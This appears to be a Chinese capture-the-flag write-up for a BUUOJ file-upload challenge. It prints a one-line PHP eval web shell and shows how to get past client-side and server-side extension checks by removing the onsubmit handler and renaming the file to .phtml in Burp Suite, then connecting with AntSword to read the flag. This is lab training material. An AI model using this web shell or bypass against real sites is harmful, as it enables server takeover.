题目来源:
题目来源
https://buuoj.cn/
找到上传点
鼠标移动到灯泡上就可以看到一个文件上传表单出现。
试一下一句话木马,上传shell.php。
代码语言:javascript复制<?php eval($_POST['shell']) ?>
弹窗告诉我们只能上传jpg、png、gif格式的文件。
绕过文件验证
查看网页源代码,发现前端对文件格式进行了验证,删掉这个onsubmit
事件再上传。
<form enctype="multipart/form-data" method="post" onsubmit="return checkFile()">
回显nonono~ Bad file!
,上传还是失败,可能后端也对文件格式进行了过滤。
用burpsuite抓包,改包改掉shell.php的后缀名,改为shell.phtml,然后放包。
可以看到前端回显上传文件的目录地址,上传成功。
蚁剑连接
添加数据,URL一栏填网站 上传一句话的目录位置,比如我的是:
代码语言:javascript复制http://446fb0a2-7e51-47e8-b47b-54bb6a39b3f7.node4.buuoj.cn:81//uplo4d/bd914ca4997d34857501cefab0064162.phtml
连接成功,发现flag就在根目录。